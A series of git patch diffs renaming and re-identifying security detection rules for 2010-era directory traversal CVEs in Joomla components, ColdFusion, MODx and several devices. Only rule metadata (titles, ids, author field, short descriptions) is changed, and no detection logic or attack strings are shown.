-id: be925ca8-6808-4c32-951d-6069597c2cab
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-1954 exploitation attempt
+id: 2ccf65c5-e4b3-48f6-961e-93bbd537ca80
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot)
diff --git a/rules/web/web_cve_CVE-2010-1955.yaml b/rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml
similarity index 81%
rename from rules/web/web_cve_CVE-2010-1955.yaml
rename to rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml
index fb9bb13f..10d81d67 100644
--- a/rules/web/web_cve_CVE-2010-1955.yaml
+++ b/rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-1955:Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion
-id: 9d34dee7-212f-49a0-a1fe-41b37ea241d9
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-1955 exploitation attempt
+id: 497c0911-226f-48a1-ac9f-518ffb98e65e
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory)
diff --git a/rules/web/web_cve_CVE-2010-1979.yaml b/rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml
similarity index 81%
rename from rules/web/web_cve_CVE-2010-1979.yaml
rename to rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml
index a88364c8..80eb1897 100644
--- a/rules/web/web_cve_CVE-2010-1979.yaml
+++ b/rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-1979:Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion
-id: 4ccbb33d-d6d9-4f18-bc7f-502bd3cc9481
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-1979 exploitation attempt
+id: 5b1c3030-e17b-43b3-b95e-952355a0f43f
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds)
diff --git a/rules/web/web_cve_CVE-2010-1983.yaml b/rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml
similarity index 82%
rename from rules/web/web_cve_CVE-2010-1983.yaml
rename to rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml
index 7543adad..a29bfea4 100644
--- a/rules/web/web_cve_CVE-2010-1983.yaml
+++ b/rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-1983:Joomla! Component redTWITTER 1.0 - Local File Inclusion
-id: fae044ae-fe67-4a83-809f-7a3203ee1a6d
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-1983 exploitation attempt
+id: c4f29c4f-0281-4518-a824-88f259d92ef5
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the redTWITTER (com_redtwitter)
diff --git a/rules/web/web_cve_CVE-2010-2033.yaml b/rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml
similarity index 84%
rename from rules/web/web_cve_CVE-2010-2033.yaml
rename to rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml
index bcb492f1..20b4dc70 100644
--- a/rules/web/web_cve_CVE-2010-2033.yaml
+++ b/rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-2033:Joomla Percha Categories Tree 0.6 - Local File Inclusion
-id: 80fca714-f31f-48e7-82cd-07bb3ed0917d
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-2033 exploitation attempt
+id: b5c6267a-7b2e-47c8-84dd-68a89ceb1e64
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach)
diff --git a/rules/web/web_cve_CVE-2010-2036.yaml b/rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml
similarity index 82%
rename from rules/web/web_cve_CVE-2010-2036.yaml
rename to rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml
index 58d3c310..f6c9adca 100644
--- a/rules/web/web_cve_CVE-2010-2036.yaml
+++ b/rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-2036:Joomla! Component Percha Fields Attach 1.0 - Directory Traversal
-id: b86f1914-f00b-4ba3-8f0b-3db29399d4d7
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-2036 exploitation attempt
+id: 5f89e5fb-6f87-4fee-96b2-700e987a1c7e
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach)
diff --git a/rules/web/web_cve_CVE-2010-2259.yaml b/rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml
similarity index 82%
rename from rules/web/web_cve_CVE-2010-2259.yaml
rename to rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml
index 55e68a9e..70cc525b 100644
--- a/rules/web/web_cve_CVE-2010-2259.yaml
+++ b/rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-2259:Joomla! Component com_bfsurvey - Local File Inclusion
-id: a95a2207-33da-40df-a4ab-f8a53d8e99d9
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-2259 exploitation attempt
+id: 7ead4790-e0f8-41fa-bb14-f1d225964fd4
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component
diff --git a/rules/web/web_cve_CVE-2010-2307.yaml b/rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml
similarity index 80%
rename from rules/web/web_cve_CVE-2010-2307.yaml
rename to rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml
index 3b4a10be..32008b7c 100644
--- a/rules/web/web_cve_CVE-2010-2307.yaml
+++ b/rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml
@@ -1,7 +1,6 @@
-title: CVE-2010-2307:Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - - Directory Traversal
-id: 6251acca-594f-48d0-8ec8-6f156c844e6e
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-2307 exploitation attempt
+id: 6e0a4fc5-c7a5-40c6-a080-bc5a452637a9
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Multiple directory traversal vulnerabilities in the web server for Motorola
diff --git a/rules/web/web_cve_CVE-2010-2682.yaml b/rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml
similarity index 82%
rename from rules/web/web_cve_CVE-2010-2682.yaml
rename to rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml
index 170858c7..01e0fedc 100644
--- a/rules/web/web_cve_CVE-2010-2682.yaml
+++ b/rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-2682:Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
-id: 1f409782-791f-4d8b-a63b-d0d713463cdb
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-2682 exploitation attempt
+id: 5f7ea8cf-47e3-46e6-a173-43a99c904e43
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna)
diff --git a/rules/web/web_cve_CVE-2010-2861.yaml b/rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml
similarity index 86%
rename from rules/web/web_cve_CVE-2010-2861.yaml
rename to rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml
index 40081783..7dc8e6df 100644
--- a/rules/web/web_cve_CVE-2010-2861.yaml
+++ b/rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-2861:Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
-id: 7ceb4e78-34fa-48a5-be21-a50307631d19
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-2861 exploitation attempt
+id: 21032758-8761-4a18-8f66-bace612e2481
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Multiple directory traversal vulnerabilities in the administrator console
diff --git a/rules/web/web_cve_CVE-2010-3426.yaml b/rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml
similarity index 80%
rename from rules/web/web_cve_CVE-2010-3426.yaml
rename to rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml
index 42379e8a..ad2dab17 100644
--- a/rules/web/web_cve_CVE-2010-3426.yaml
+++ b/rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-3426:Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion
-id: a991b845-3035-492c-914d-0cb7b0e7bd10
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-3426 exploitation attempt
+id: 06621f7e-2987-4625-8c42-d66951a9da9d
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone)
diff --git a/rules/web/web_cve_CVE-2010-4231.yaml b/rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml
similarity index 81%
rename from rules/web/web_cve_CVE-2010-4231.yaml
rename to rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml
index dbe3d725..5e4062f3 100644
--- a/rules/web/web_cve_CVE-2010-4231.yaml
+++ b/rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-4231:Camtron CMNC-200 IP Camera - Directory Traversal
-id: 8c7f0cbc-c7cd-4bb5-87ef-9e2ff125b7d8
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-4231 exploitation attempt
+id: 8eb41b36-2b5a-44e0-a44b-b0ebdbff3e1b
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: The CMNC-200 IP Camera has a built-in web server that is enabled by default.
diff --git a/rules/web/web_cve_CVE-2010-4617.yaml b/rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml
similarity index 82%
rename from rules/web/web_cve_CVE-2010-4617.yaml
rename to rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml
index f31d5418..080cc881 100644
--- a/rules/web/web_cve_CVE-2010-4617.yaml
+++ b/rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-4617:Joomla! Component JotLoader 2.2.1 - Local File Inclusion
-id: 35c29803-4068-4a64-a007-d2b6984f8c58
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-4617 exploitation attempt
+id: ed14d2cb-8716-4ab1-a819-36d173e617ab
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the JotLoader (com_jotloader) component
diff --git a/rules/web/web_cve_CVE-2010-5278.yaml b/rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml
similarity index 85%
rename from rules/web/web_cve_CVE-2010-5278.yaml
rename to rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml
index fd292926..cf20ed0e 100644
--- a/rules/web/web_cve_CVE-2010-5278.yaml
+++ b/rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-5278:MODx manager - Local File Inclusion
-id: 5e042bf8-67ea-4455-8b75-07c57d7ccdad
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-5278 exploitation attempt
+id: 57bb7f1b-bb41-400d-a6e4-7eb2b70b3593
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php
From 3f27295e64b91e7aed6eff5ccf2a5c0c3b52573b Mon Sep 17 00:00:00 2001
From: pbssubhash
Date: Wed, 25 Aug 2021 21:47:33 +0530
Subject: [PATCH 0582/1367] Stupid Author field
---
 rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml | 4 ++--
rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml | 4 ++--
 rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml | 4 ++--
 32 files changed, 64 insertions(+), 64 deletions(-)
diff --git a/rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml
index d6be923a..a6ec1f7d 100644
--- a/rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-0943 exploitation attempt
-id: 63b70c55-0d7a-4e2f-a130-11028352b6ff
-Author: Subhash Popuri (@pbssubhash)
+id: fa7e28e3-d286-4c38-b6df-41eb004b66ba
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the JA Showcase (com_jashowcase)
diff --git a/rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml
index c38d952b..f96cb67b 100644
--- a/rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-0944 exploitation attempt
-id: d30903f7-cb51-445f-81a1-f2948f5fb763
-Author: Subhash Popuri (@pbssubhash)
+id: c656c178-4f5a-4dc4-a605-21e225987ac5
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the JCollection (com_jcollection)
diff --git a/rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml
index 70431ad7..8cead1aa 100644
--- a/rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1306 exploitation attempt
-id: a12a5acd-3ebf-46b8-9ff3-95daeb84b801
-Author: Subhash Popuri (@pbssubhash)
+id: b2105629-bb00-47a1-a01e-24147433710c
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component
diff --git a/rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml
index 7faa239f..6e4902b2 100644
--- a/rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1314 exploitation attempt
-id: 24c87e4f-7206-451a-9164-364ca4f3c388
-Author: Subhash Popuri (@pbssubhash)
+id: 532cef3e-f3cc-437d-b6da-146675cb61ac
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Highslide JS (com_hsconfig)
diff --git a/rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml
index 25b32926..1286b44e 100644
--- a/rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1345 exploitation attempt
-id: 5f723f65-f584-49f3-87c0-7babbae20d9d
-Author: Subhash Popuri (@pbssubhash)
+id: 8869cdca-39da-496a-ba9c-c9eeb5c51a4c
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms)
diff --git a/rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml
index 1ba62bda..206da49b 100644
--- a/rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1353 exploitation attempt
-id: 26d15692-1cfc-4427-8e7d-9a364c2628f3
-Author: Subhash Popuri (@pbssubhash)
+id: e464164c-0cb6-427f-9eea-06dbf29d3044
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox)
diff --git a/rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml
index 21b6dc41..29e32c32 100644
--- a/rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1474 exploitation attempt
-id: 5b50ffc4-dde4-4905-9da9-eb499ee53971
-Author: Subhash Popuri (@pbssubhash)
+id: 4964f728-0184-4efb-b8b1-23087da5baab
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper)
diff --git a/rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml
index 4786c685..50fbb166 100644
--- a/rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1475 exploitation attempt
-id: 69295f5a-428a-47d6-bf4d-a93bb23270ca
-Author: Subhash Popuri (@pbssubhash)
+id: 5f4ba4e9-6b51-4284-afdf-15485b08088f
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive)
diff --git a/rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml
index 9e3ef52a..3f165d2a 100644
--- a/rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1495 exploitation attempt
-id: e21410ad-5016-457a-a48f-2da871951471
-Author: Subhash Popuri (@pbssubhash)
+id: 24ffa234-2963-4518-b72d-7aae991d1189
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Matamko (com_matamko) component
diff --git a/rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml
index bb5f49b8..295628c1 100644
--- a/rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1532 exploitation attempt
-id: 92b23f0b-aa99-497a-a0f1-f7e632bcad7b
-Author: Subhash Popuri (@pbssubhash)
+id: d65086e6-88a4-45e5-bc99-b1695aff4bd7
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail)
diff --git a/rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml
index 31ae9336..17821b03 100644
--- a/rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1533 exploitation attempt
-id: 2e547af2-0fb1-4d26-829e-fb42d959133c
-Author: Subhash Popuri (@pbssubhash)
+id: ad63c834-1072-4c2d-b246-f615557b3026
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the TweetLA (com_tweetla) component
diff --git a/rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml
index d2ee67cd..38236528 100644
--- a/rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1535 exploitation attempt
-id: 7dbde0a0-bd74-47ba-85f7-32093ffbd50c
-Author: Subhash Popuri (@pbssubhash)
+id: b0962f54-4cfd-4059-b742-af6f4e82e8b2
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the TRAVELbook (com_travelbook)
diff --git a/rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml
index 564faaf9..2c2df33e 100644
--- a/rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1602 exploitation attempt
-id: d79bf48d-2705-4da1-929b-37e07764998f
-Author: Subhash Popuri (@pbssubhash)
+id: fdf12606-2a8a-4450-b3b7-e6bdf03e7096
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment)
diff --git a/rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml
index 447bbe51..74080bca 100644
--- a/rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1657 exploitation attempt
-id: 7bdc9bd3-8dcd-4187-ab28-98b20cc1d020
-Author: Subhash Popuri (@pbssubhash)
+id: 41364f89-94ca-464d-8ab4-0c1348656707
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the SmartSite (com_smartsite) component
diff --git a/rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml
index 148380f1..87d7b66a 100644
--- a/rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1718 exploitation attempt
-id: a538251c-d600-43f3-8051-c3a83a5e8702
-Author: Subhash Popuri (@pbssubhash)
+id: 14f01fca-dec5-4144-a40c-63488767b57f
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in archeryscores.php in the Archery
diff --git a/rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml
index 94179320..eff64809 100644
--- a/rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1722 exploitation attempt
-id: 84715b18-505d-4252-9470-03c98a3006e5
-Author: Subhash Popuri (@pbssubhash)
+id: d1b8ce75-b746-48a9-ad5c-4d692f5a21a0
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Online Market (com_market) component
diff --git a/rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml
index 9bd796a5..356a6f8a 100644
--- a/rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1875 exploitation attempt
-id: af757e17-ad81-4a28-a551-49c17aa5113a
-Author: Subhash Popuri (@pbssubhash)
+id: 9fec2f12-8d56-4b94-8140-be92319e6282
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Real Estate Property (com_properties)
diff --git a/rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml
index 4f10cf4e..cdcf71d5 100644
--- a/rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1953 exploitation attempt
-id: 0fc4af77-6974-4e50-bf5e-9f175304eb54
-Author: Subhash Popuri (@pbssubhash)
+id: b83f9267-f61a-4a52-a39c-2244330665c8
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap)
diff --git a/rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml
index 23ef2619..4430f4fb 100644
--- a/rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1954 exploitation attempt
-id: 2ccf65c5-e4b3-48f6-961e-93bbd537ca80
-Author: Subhash Popuri (@pbssubhash)
+id: e15b002d-bfad-4ae6-8253-5c5e1d3d7c61
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot)
diff --git a/rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml
index 10d81d67..6204191c 100644
--- a/rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1955 exploitation attempt
-id: 497c0911-226f-48a1-ac9f-518ffb98e65e
-Author: Subhash Popuri (@pbssubhash)
+id: e5ac823c-60fa-40c5-b7b2-965e023d3747
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory)
diff --git a/rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml
index 80eb1897..ee9852f8 100644
--- a/rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1979 exploitation attempt
-id: 5b1c3030-e17b-43b3-b95e-952355a0f43f
-Author: Subhash Popuri (@pbssubhash)
+id: 62b49fe0-8735-4c00-ac45-52ac7b673174
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
